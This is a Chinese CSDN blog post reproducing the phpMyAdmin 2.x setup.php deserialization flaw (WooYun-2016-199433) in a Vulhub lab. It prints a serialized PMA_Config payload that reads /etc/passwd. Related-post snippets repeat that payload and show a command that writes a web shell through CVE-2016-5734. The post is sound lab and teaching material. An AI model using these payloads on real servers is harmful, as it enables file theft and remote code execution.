Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)

于 2024-05-03 19:26:50 发布
阅读量435 收藏 2
点赞数 11
分类专栏: vulhub靶场 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Grace_for_it/article/details/138422129
版权

今天复现的是vulhub靶场的phpmyadmin   /scripts/setup.php的 反序列化漏洞

影响版本:phpmyadmin 2.x

1.靶场启动:

进入到指定的靶场目录:/phpmyadmin/WooYun-2016-199433,启动命令:

docker-compose up -d

done 即启动完毕:

2.访问靶场环境:

访问靶机ip地址+8080端口,此处我的为http://192.168.23.133:8080/

出现以下phpmyadmin页面即为成功:

3.漏洞复现

1)使用bp进行抓包,访问当前页面,并拦截数据包:

2)将数据包进行以下构造:

3)发送到repeater模块进行重发,观察返回值:

可以看到,我们读取到了/etc/passwd下的内容:

至此复现成功!

漏洞成因:

分析源码我们发现setup.php页面存在一个post传入的参数

POST['configuration']

并且对它进行了反序列化操作

流程分析:

1、configuration参数通过 POST传入,被unserialize反序列化成对象

2、反序列化之后,会执行PMA_Config对象的生成

3、$source变量具有文件读取以及命令执行的敏感操作

4、调用getSource()函数取出变量$source 中的值

5、最后通过file_get_contents()函数打开并且读取/etc/passwd文件!

构造payload:

所以bp构造数据包时,使用的payload为

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

thinknothing_
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 353
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 331
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 397
Phpmyadmin Scripts / setup.php反序列化漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
WooYun-2016-199433 phpmyadmin反序列化漏洞复现
丶没胡子的猫
01-25 953
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
[Vulhub](WooYun-2016-199433phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 785
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
phpMyAdmin-4.9.2-all-languages.tar.gz
06-17
phpMyAdmin-4.9.2-all-languages.tar.gz, 中文版本。在项目目录直接解压即可,可以使用root来登录。用来管理数据库,如mysql,mariadb等
phpMyAdmin-4.4.5-all-languages.zip
12-29
phpMyAdmin 是一个用PHP编写的,可以通过互联网控制和操作MySQL。通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制/删除数据等等。
phpMyAdmin-5.0.4-all-languages.zip
10-30
phpMyAdmin-5.0.4-all-languages.zip搬运,因为某些原因,此网站墙了,所以放出来供需要的朋友下载
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
什么是phpMyAdminphpMyAdmin是一个用PHP编写的免费软件工具,旨在处理Web上MySQL管理。 phpMyAdmin在MySQL和MariaDB上支持多种操作。 可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
Phpmyadmin 2.X 反序列化漏洞WooYun-2016-199433
jammny
11-28 1193
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3564
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin 2.x版本任意文件读取
网络安全。
01-18 843
0x01 简介 phpmyadmin scripts/setup.php 页面存在反序列化漏洞WooYun-2016-199433phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02 漏洞复现 POST /scripts/setup.php HTTP/1.1 Host: ip:8080 User-Agent: Mozilla/5...
Windows任意文件读取漏洞
a1b2c3是弱口令
12-21 5084
低权限用户或恶意程序读取目标Windows计算机上任何文件的内容,设想你在内网测试的时候取得了一个普通权限,还能干吗,用该漏洞作者SandboxEscaper的一句话来说,也许是密码文件,我不够聪明,不知道能干吗。 漏洞故事 Twitter别名SandboxEscaper的安全研究员12月20日发布了针对微软Windows操作系统的新oday漏洞的概念验证(PoC)漏洞利用。 SandboxE...
料理phpMyAdmin2.6以上版本数据乱码结果
weixin_30515513的博客
03-07 60
来历:网海拾贝 在phpMyAdmin2.6以上版本由于支撑多说话集,弄得我们运用phpMyAdmin经管数据库的时刻,查询出来的中文都是乱码,但是在我们的PHP办法挪用时却没有这些结果。看来是phpMyAdmin2.6的设置有结果了,为领会决这个结果,我上google上搜刮了相干材料,这类的结果很多,但没一个可以料理的,真是没体例,看来只需本身入手料理了。 。。...
phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞
serendipity1130的博客
09-01 815
CVE-2016-5734 1.访问8080端口,用弱口令root root登录 2. 在Kali中有自带的EXP: searchsploit phpmyadmin 3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马: python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php'
phpMyAdmin开启远程登陆导致本地文件读取
weixin_45116657的博客
10-22 257
phpMyAdmin开启远程登录导致本地文件读取
每天复现一个漏洞--vulhub
qq836869520的博客
11-30 926
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433漏洞原理:http://www.polaris-lab.com/index.php/archives/66/ 根据提示我们先进入到 /scripts/setup.php 的目录下 由于 configuration 参数是可控的 所以我们可以根据 poc...
我的后台服务为什么会有 /phpMyAdmin-2.10.3/scripts/setup.php的访问记录
最新发布
06-09
这可能是因为您的服务器安装了 phpMyAdmin,而 /phpMyAdmin-2.10.3/scripts/setup.phpphpMyAdmin 的一部分。setup.php 是用于安装和配置 phpMyAdmin 的脚本,因此如果有关于它的访问记录,可能是有人试图在您的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值